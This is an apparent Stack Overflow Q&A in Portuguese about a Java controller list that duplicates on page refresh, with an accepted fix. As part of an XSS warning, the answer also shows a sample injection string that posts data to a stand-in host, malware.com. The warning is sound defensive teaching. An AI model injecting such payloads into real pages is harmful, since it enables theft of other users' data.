# ArrayList se repetindo

Tags: javascript, java, array, jsf

Eu tenho um array que sempre que eu atualizo a minha página, ele duplica. Fiz alguns testes para ver se não estava se duplicando no JavaScript, porém não encontrei nada.

Esse é o JavaScript:

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
        <script>

           listaProjetoArr = "";
           listaProjeto = "";


           listaProjeto = "${usuarioBean.listaNomeProjeto}";

            listaProjeto = listaProjeto.replace("[", "");
            listaProjeto = listaProjeto.replace("]", "");
            var listaProjetoArr = listaProjeto.split(",");
            console.log(listaProjetoArr)



            $.each(listaProjetoArr, function(index, value) {


                $("#projeto").append("<option value='"+value+"'>"+value+"</option>");
            });
        </script>
```

E esse é o método do controller:

```java
@RequestMapping(value = REDIRECT_PAGE_CADASTRO, method = RequestMethod.GET)
    public ModelAndView viewCadastro(Model model) {

        List<Projeto> listaCompletaProjeto = projetoService.findAll();

        for (Projeto listaProjetos : listaCompletaProjeto) {

            listaNomeProjeto.add(listaProjetos.getProjeto());

        }

        List<Perfil> listaCompletaPerfil = perfilService.findAll();

        for (Perfil listaPerfis : listaCompletaPerfil) {

            listaNomePerfil.add(listaPerfis.getPerfil().toString());
        }

        List<Jornada> listaCompletaJornada = jornadaService.findAll();

        for (Jornada listaJornadas : listaCompletaJornada) {

            listaNomeJornada.add(listaJornadas.getDsJornada().toString());
        }

        usuarioBean = new UsuarioBean(listaNomeProjeto, listaNomePerfil, listaNomeJornada);

        model.addAttribute("usuarioBean", usuarioBean);

        return new ModelAndView(REQUEST_MAPPING_PAGE_CADASTRO);
    }
```

Comment: O seu controller está anotado com `@SessionScope`? Quais são as anotações dele? Onde e como está declarado o `listaNomeProjeto`, o `listaNomePerfil` e o `listaNomeJornada`?

Comment: nao esta anotado com @SessionScope e as cosntantes estao declaradas assim private List<String> listaNomeProjeto = new ArrayList<String>();

 private List<String> listaNomePerfil = new ArrayList<String>();

 private List<String> listaNomeJornada = new ArrayList<String>();

Comment: Provavelmente o `listaNomePerfil` está global, você tem que colocar a instância dele dentro do método

Comment: entao mais eu estou instanciando tudo pelo Bean

Comment: Recomendo você postar então a sua classe de controller completa.

Answer (score 3, accepted):

Suponho que o seu controller tenha um campo assim:

```java
private List<String> listaNomeProjeto;
```

E que ele foi inicializado adequadamente em algum lugar. Quando você chama o método `viewCadastro(Model model)` para renderizar a sua página do JSF, ele faz isso:

```java
    List<Projeto> listaCompletaProjeto = projetoService.findAll();

    for (Projeto listaProjetos : listaCompletaProjeto) {

        listaNomeProjeto.add(listaProjetos.getProjeto());

    }
```

Neste código, você **adiciona** todos os nomes projetos à lista. O JSF vai renderizar a página e a lista estará lá.

Quando você apertar F5, o método `viewCadastro(Model model)` vai ser chamado de novo e você vai adicionar os elementos na lista **de novo**, porém **sem ter removido** os elementos anteriores que lá estavam, e com isso vai acabar duplicando.

A solução é fazer isso:

```java
    List<Projeto> listaCompletaProjeto = projetoService.findAll();
    listaNomeProjeto = new ArrayList<>(listaCompletaProjeto.size());
    for (Projeto listaProjetos : listaCompletaProjeto) {
        listaNomeProjeto.add(listaProjetos.getProjeto());
    }
```

Ou então, você pode usar os streams do Java 8:

```java
    List<Projeto> listaCompletaProjeto = projetoService.findAll();
    listaNomeProjeto = listaCompletaProjeto.stream().map(Projeto::getProjeto).collect(Collectors.toList());
```

Além disso, tome cuidado com o [XSS](https://en.wikipedia.org/wiki/Cross-site_scripting). Se o nome de algum dos projetos puder ser manipulado por algum usuário mal-intencionado, você terá problemas caso algum usuário crie um projeto com esse nome ou coisa parecida:

```
x]"; $.post('http://malware.com/upload', informacaoMuitoSecreta); //
```

Uma vez que isso fará com que o seu JavaScript fique assim:

```js
listaProjeto = "[Projeto do Pedro,Projeto da Maria,x]"; $.post('http://malware.com/upload', informacaoMuitoSecreta); //,Projeto do Zé]";
```

E o resultado é que o usuário mal-intencionado poderia injetar trechos de JavaScript para serem executados por outros usuários e com isso causar algum estrago ou roubar alguma informação.